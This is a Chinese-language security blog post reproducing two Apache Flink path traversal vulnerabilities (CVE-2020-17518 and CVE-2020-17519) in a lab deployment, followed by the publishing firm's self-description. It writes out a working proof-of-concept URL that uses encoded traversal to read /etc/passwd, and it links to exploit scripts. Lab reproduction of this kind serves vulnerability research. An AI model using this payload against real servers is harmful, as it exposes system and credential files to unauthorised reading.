Apache Flink漏洞(CVE-2020-17518&CVE-2020-17519)复现

admin 2021年1月27日08:05:01评论232 views字数 1014阅读3分22秒阅读模式

Apache Flink漏洞(CVE-2020-17518&CVE-2020-17519)复现

本月,Apache Flink项目公开了该框架中的两个严重的路径遍历漏洞,攻击者可以通过该漏洞在易受攻击的系统上上传和查看任意文件。

Apache Flink是一个用Java和Scala编写的开源统一流处理和批处理框架。在披露后的几个小时内,黑客已发布了漏洞的PoC,可用于攻击存在漏洞的Apache Flink实例。


漏洞复现

部署flink-1.11.2[1]

 

CVE-2020-17518:通过路径遍历上传任意文件

Apache Flink漏洞(CVE-2020-17518&CVE-2020-17519)复现

POC:

Apache Flink漏洞(CVE-2020-17518&CVE-2020-17519)复现

Apache Flink漏洞(CVE-2020-17518&CVE-2020-17519)复现

 

CVE-2020-17519:通过路径遍历读取任意文件

POC:

http://10.0.0.2:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Apache Flink漏洞(CVE-2020-17518&CVE-2020-17519)复现

 

参考链接

  1. https://archive.apache.org/dist/flink/flink-1.11.2/

  2. https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518

  3. https://github.com/B1anda0/CVE-2020-17519/blob/main/CVE-2020-17519.py



关于山石网科安全技术研究院



    山石安研院是山石网科的信息安全智库部门,主要负责反APT研究、出战及承办全球攻防赛事、高端攻防技术培训、全球中英文安全预警分析发布、各类软硬件漏洞挖掘和利用研究、承接国家网络安全相关课题、不定期发布年度或半年度的各类技术报告及公司整体攻防能力展现。技术方向包括移动安全、虚拟化安全、工控安全、物联安全、区块链安全、协议安全、源码安全、反APT及反窃密。
    为多省公安厅提供技术支撑工作,为上合峰会、财富论坛、金砖五国等多次重大活动提供网络安保支撑工作。在多次攻防赛事中连获佳绩,网安中国行第一名,连续两届红帽杯冠军、网鼎杯线上第一名,在补天杯、极棒杯、全国多地的护网演习等也都获得优秀的成绩,每年获得大量的CNVD、CNNVD、CICSVD、CVE证书、编号和致谢。如需帮助请咨询 [email protected]

Apache Flink漏洞(CVE-2020-17518&CVE-2020-17519)复现


本文始发于微信公众号(山石网科安全技术研究院):Apache Flink漏洞(CVE-2020-17518&CVE-2020-17519)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月27日08:05:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Flink漏洞(CVE-2020-17518&CVE-2020-17519)复现http://cn-sec.com/archives/254839.html

发表评论

匿名网友 填写信息